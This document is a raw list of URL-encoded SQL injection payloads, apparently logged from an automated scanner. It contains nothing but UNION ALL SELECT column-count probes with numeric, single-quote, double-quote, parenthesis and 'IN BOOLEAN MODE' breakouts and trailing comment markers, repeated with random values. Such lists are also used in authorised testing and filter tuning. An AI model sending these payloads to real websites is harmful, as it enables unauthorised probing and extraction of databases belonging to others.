1234.5%20%2B%20%28SELECT%207874%20WHERE%205333%3D5333%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201096%20WHERE%201768%3D1768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208778%20WHERE%208484%3D8484%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27CyIQ%27%20FROM%20DUAL%20WHERE%205968%3D5968%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27EFrp%27%20FROM%20DUAL%20WHERE%207285%3D7285%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Xgtf%27%20FROM%20DUAL%20WHERE%206581%3D6581%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lWsN%27%20FROM%20DUAL%20WHERE%204157%3D4157%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27xjrV%27%20FROM%20DUAL%20WHERE%209676%3D9676%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27TfSI%27%20FROM%20DUAL%20WHERE%207631%3D7631%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FXVO%27%20FROM%20DUAL%20WHERE%207849%3D7849%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27kPdR%27%20FROM%20DUAL%20WHERE%209215%3D9215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Adxu%27%20FROM%20DUAL%20WHERE%208387%3D8387%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27IZAt%27%20FROM%20DUAL%20WHERE%207154%3D7154%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RyiC%27%20WHERE%204571%3D4571%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27asxU%27%20WHERE%206110%3D6110%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FtVL%27%20WHERE%205390%3D5390%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Hsrj%27%20WHERE%203416%3D3416%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RATo%27%20WHERE%206762%3D6762%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27XGdm%27%20WHERE%202999%3D2999%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NPwu%27%20WHERE%208407%3D8407%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uiSH%27%20WHERE%209771%3D9771%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lVMw%27%20WHERE%208334%3D8334%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27fFmA%27%20WHERE%203831%3D3831%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -9437%29%20UNION%20ALL%20SELECT%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%2C%207374%23 -7589%29%20UNION%20ALL%20SELECT%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%23 -1239%29%20UNION%20ALL%20SELECT%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%2C%206560%23 -8915%29%20UNION%20ALL%20SELECT%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%23 -7871%29%20UNION%20ALL%20SELECT%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%2C%209400%23 -3003%29%20UNION%20ALL%20SELECT%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%2C%206181%23 -1906%29%20UNION%20ALL%20SELECT%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%2C%203989%23 -8369%29%20UNION%20ALL%20SELECT%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%2C%207547%23 -5542%29%20UNION%20ALL%20SELECT%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%23 -3685%29%20UNION%20ALL%20SELECT%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%23 -3750%27%29%20UNION%20ALL%20SELECT%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%23 -7765%27%29%20UNION%20ALL%20SELECT%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%23 -7911%27%29%20UNION%20ALL%20SELECT%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%23 -4225%27%29%20UNION%20ALL%20SELECT%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%23 -9494%27%29%20UNION%20ALL%20SELECT%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%2C%208657%23 -1683%27%29%20UNION%20ALL%20SELECT%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%2C%207651%23 -2409%27%29%20UNION%20ALL%20SELECT%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%23 -8807%27%29%20UNION%20ALL%20SELECT%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%23 -3095%27%29%20UNION%20ALL%20SELECT%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%23 -2354%27%29%20UNION%20ALL%20SELECT%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%2C%208126%23 -8092%27%20UNION%20ALL%20SELECT%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%23 -9497%27%20UNION%20ALL%20SELECT%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%23 -1490%27%20UNION%20ALL%20SELECT%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%23 -3415%27%20UNION%20ALL%20SELECT%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%2C%203007%23 -3316%27%20UNION%20ALL%20SELECT%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%23 -9903%27%20UNION%20ALL%20SELECT%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%2C%207024%23 -3601%27%20UNION%20ALL%20SELECT%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%23 -5784%27%20UNION%20ALL%20SELECT%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%23 -6479%27%20UNION%20ALL%20SELECT%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%2C%208509%23 -5196%27%20UNION%20ALL%20SELECT%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%23 -7981%22%20UNION%20ALL%20SELECT%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%23 -9173%22%20UNION%20ALL%20SELECT%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%2C%206059%23 -3638%22%20UNION%20ALL%20SELECT%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%23 -3696%22%20UNION%20ALL%20SELECT%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%2C%204033%23 